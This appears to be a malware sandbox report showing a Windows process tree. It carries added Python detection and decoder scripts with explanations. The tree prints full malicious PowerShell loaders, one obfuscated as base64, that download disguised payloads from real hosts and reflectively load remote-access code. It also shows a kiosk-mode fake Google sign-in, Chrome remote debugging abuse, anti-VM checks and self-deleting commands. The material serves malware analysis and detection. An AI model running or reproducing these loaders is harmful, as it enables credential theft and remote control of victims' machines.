                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1144 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:2
                                              9⤵
                                                PID:1472
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                9⤵
                                                  PID:3452
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                  9⤵
                                                    PID:3160
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2328 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:1
                                                    9⤵
                                                    • Uses browser remote debugging
                                                    PID:3604
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2340 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:1
                                                    9⤵
                                                    • Uses browser remote debugging
                                                    PID:3624
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1468 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:2
                                                    9⤵
                                                      PID:3876
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --mojo-platform-channel-handle=3304 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:1
                                                      9⤵
                                                      • Uses browser remote debugging
                                                      PID:3948
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1240 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                      9⤵
                                                        PID:3968
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1324 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                        9⤵
                                                          PID:3996
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3696 --field-trial-handle=1220,i,7566532239664986547,8592673247342716182,131072 /prefetch:8
                                                          9⤵
                                                            PID:3220
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\jm7qq" & exit
                                                          8⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4068
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 11
                                                            9⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Delays execution with timeout.exe
                                                            PID:3968
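Two things in the subtrees above are worth turning into detection logic. The 0b6be3303c.exe stage kills every installed browser with `taskkill /F /IM ... /T` and then relaunches Firefox in `--kiosk` mode on a URL whose query string points at a Google password challenge (a full-screen fake sign-in). The cd3dfab0e4.exe stage starts Chrome with `--remote-debugging-port=9223`, which exposes the DevTools protocol on localhost to whatever process launched it; note that Chrome's own renderer children inherit that flag (they carry the same "Uses browser remote debugging" tag above), so a rule on the flag alone fires several times per launch and needs a parent check. The script below is an added example, not part of the sandbox report and not code from any of the families named in the extracted configs. It replays command lines copied from the tree as constructed process-creation events; the event fields, the rule names, the list of credential hosts and the assumption that the list is in creation order are this example's own choices, not a sandbox or SIEM schema.

```python
"""Command-line triage for the browser-abuse chain in this process tree.

Added example, not part of the sandbox report.  Events below are constructed
from command lines in the tree; field and rule names are this example's own.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
# Hosts a kiosk-mode launch from a non-browser parent should never point at
# (assumed list; extend for your tenant's identity providers).
CREDENTIAL_HOSTS = ("accounts.google.com", "login.microsoftonline.com", "login.live.com")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the created process
    parent_image: str  # full path of the creating process
    cmdline: str


def image_name(path: str) -> str:
    """'C:\\Program Files\\Mozilla Firefox\\firefox.exe' -> 'firefox.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def tag_event(ev: ProcEvent) -> set:
    """Per-event rules; each adds a tag name when it matches."""
    tags = set()
    name, parent, cl = image_name(ev.image), image_name(ev.parent_image), ev.cmdline.lower()

    # taskkill /F /IM <browser> /T: the user's real browser is cleared first.
    if name == "taskkill.exe":
        m = re.search(r'/im\s+"?([\w.-]+)', cl)
        if m and m.group(1) in BROWSERS:
            tags.add("browser_killed")

    if name in BROWSERS:
        # DevTools protocol exposed on localhost.  Chrome's own child processes
        # inherit the flag, so only fire when the parent is not a browser.
        if ("--remote-debugging-port=" in cl or "--remote-debugging-pipe" in cl) \
                and parent not in BROWSERS:
            tags.add("remote_debugging_from_foreign_parent")
        # Full-screen kiosk window pointed at a credential prompt: fake login UI.
        if "--kiosk" in cl and any(h in cl for h in CREDENTIAL_HOSTS):
            tags.add("kiosk_credential_page")

    return tags


def correlate(events) -> dict:
    """Group tags by creating PID.  A parent that kills browsers and afterwards
    launches one that trips another rule gets an extra 'kill_then_relaunch'."""
    by_parent = defaultdict(list)
    for ev in events:                      # assumed to be in creation order
        by_parent[ev.ppid].extend(sorted(tag_event(ev)))
    verdicts = {}
    for ppid, tags in by_parent.items():
        found = set(tags)
        if "browser_killed" in tags:
            later = tags[tags.index("browser_killed") + 1:]
            if any(t != "browser_killed" for t in later):
                found.add("kill_then_relaunch")
        if found:
            verdicts[ppid] = sorted(found)
    return verdicts


# Constructed events; command lines are taken from the process tree above.
_FF = r"C:\Program Files\Mozilla Firefox\firefox.exe"
_CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
_STAGE_A = r"C:\Users\Admin\AppData\Local\Temp\10301330101\0b6be3303c.exe"
_STAGE_B = r"C:\Users\Admin\AppData\Local\Temp\10301350101\cd3dfab0e4.exe"

SAMPLE_EVENTS = [
    ProcEvent(2940, 1356, r"C:\Windows\SysWOW64\taskkill.exe", _STAGE_A,
              "taskkill /F /IM firefox.exe /T"),
    ProcEvent(320, 1356, r"C:\Windows\SysWOW64\taskkill.exe", _STAGE_A,
              "taskkill /F /IM chrome.exe /T"),
    ProcEvent(1048, 1356, _FF, _STAGE_A,
              '"' + _FF + '" --kiosk '
              '"https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" '
              '--no-default-browser-check --disable-popup-blocking'),
    ProcEvent(2964, 3236, _CHROME, _STAGE_B,
              '"' + _CHROME + '" --remote-debugging-port=9223 --profile-directory="Default"'),
    # Chrome's renderer inherits the flag; must not fire on its own.
    ProcEvent(3604, 2964, _CHROME, _CHROME,
              '"' + _CHROME + '" --type=renderer --remote-debugging-port=9223 --lang=en-US /prefetch:1'),
    # Constructed benign launch from the shell, for contrast.
    ProcEvent(4100, 1200, _CHROME, r"C:\Windows\explorer.exe",
              '"' + _CHROME + '" https://example.com'),
]

if __name__ == "__main__":
    for ppid, tags in correlate(SAMPLE_EVENTS).items():
        print(f"parent pid {ppid}: {', '.join(tags)}")
```

Run stand-alone it reports parent 1356 (kill, then kiosk credential page) and parent 3236 (remote debugging from a foreign parent); the renderer with the inherited flag and the benign launch produce nothing.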
                                                      • C:\Users\Admin\AppData\Local\Temp\10301360101\FdqlBTs.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10301360101\FdqlBTs.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:3988
                                                        • C:\Windows\system32\cmd.exe
                                                          cmd.exe /c 1.bat && 2.js
                                                          8⤵
                                                            PID:4024
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic cpu get name
                                                              9⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4052
                                                            • C:\Windows\system32\find.exe
                                                              find "QEMU"
                                                              9⤵
                                                                PID:4060
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@D
Q@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Z
w@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                                                9⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2656
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                                                                  10⤵
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3416
                                                              • C:\Windows\System32\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                                                                9⤵
                                                                  PID:3656
                                                            • C:\Users\Admin\AppData\Local\Temp\10301370101\k3t05Da.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10301370101\k3t05Da.exe"
                                                              7⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3840
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
                                                                8⤵
                                                                • Drops startup file
                                                                • System Location Discovery: System Language Discovery
                                                                PID:2704
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
                                                                  9⤵
                                                                  • Blocklisted process makes network request
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3412
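The two PowerShell stages above share one loader pattern: fetch a file served as a `.jpg`, take the text between `<<BASE64_START>>` and `<<BASE64_END>>`, base64-decode it and hand the bytes to `[System.Reflection.Assembly]::Load`. The FdqlBTs.exe stage additionally hides its whole script as base64 of UTF-16LE text with every `A` replaced by `@` (the `$dosigo` blob), and the k3t05Da.exe stage hides its download URL as plain base64 of UTF-8. One detail worth noting in the k3t05Da.exe script: `$startIndex -ge 0 -and $endIndex -gt $startIndex;` is evaluated as a bare expression rather than used in an `if`, so the loader calls `Substring` with whatever indices it got. Below is an added example, not part of the report and not the malware's code, with a decoder for each encoding layer, a fail-closed extractor for the marker-delimited payload, and a PE header check before anything is done with the result. The carrier it parses is a constructed stand-in; the real encryption02.jpg is not reproduced on this page.

```python
"""Decoders for the two PowerShell loaders in this tree.

Added example, not part of the sandbox report.  The sample carrier is
constructed; only the base64 snippets in the tests are taken from the tree.
"""
import base64
import re
import struct

START_FLAG = b"<<BASE64_START>>"
END_FLAG = b"<<BASE64_END>>"


def decode_at_blob(blob: str) -> str:
    """Reverse  $x.replace('@','A')  ->  FromBase64String  ->  Unicode.GetString."""
    raw = base64.b64decode(blob.replace("@", "A"), validate=True)
    return raw.decode("utf-16-le")


def decode_b64_url(b64: str) -> str:
    """The k3t05Da.exe stage hides its download URL as plain base64 of UTF-8."""
    return base64.b64decode(b64).decode("utf-8")


def extract_marked_payload(carrier: bytes) -> bytes:
    """Return the decoded bytes between the markers, or raise ValueError."""
    start = carrier.find(START_FLAG)
    end = carrier.find(END_FLAG)
    # The loader computes this condition but never branches on it; a sane
    # parser fails closed instead of slicing with bad indices.
    if start < 0 or end <= start:
        raise ValueError("markers missing or out of order")
    b64 = carrier[start + len(START_FLAG):end]
    b64 = re.sub(rb"\s+", b"", b64)            # tolerate line-wrapped base64
    return base64.b64decode(b64, validate=True)


def is_pe(data: bytes) -> bool:
    """Cheap sanity check: 'MZ' at offset 0 and e_lfanew pointing at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_sample_carrier() -> bytes:
    """Constructed stand-in for the downloaded 'jpg': JPEG magic, junk, then the
    markers around line-wrapped base64 of a minimal fake PE image (not a real
    assembly, just enough header for is_pe())."""
    fake_pe = bytearray(0x80)
    fake_pe[:2] = b"MZ"
    struct.pack_into("<I", fake_pe, 0x3C, 0x40)
    fake_pe[0x40:0x44] = b"PE\x00\x00"
    b64 = base64.b64encode(bytes(fake_pe))
    wrapped = b"\n".join(b64[i:i + 32] for i in range(0, len(b64), 32))
    return b"\xff\xd8\xff\xe0JUNKJUNK" + START_FLAG + wrapped + END_FLAG + b"\xff\xd9"


if __name__ == "__main__":
    # First 32 characters of the $dosigo blob from the tree above.
    print(decode_at_blob("WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@"))
    print(decode_b64_url("aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn"))
    payload = extract_marked_payload(build_sample_carrier())
    print(len(payload), "bytes, PE header:", is_pe(payload))
```

`decode_at_blob` is deliberately strict (`validate=True`): if a blob fails to decode after the `@` substitution, the variant uses a different substitution character and the replace should be adjusted, not silently skipped. The same extractor works on a real carrier saved from the network capture; a payload that passes `is_pe` can then be handed to a .NET decompiler.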
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
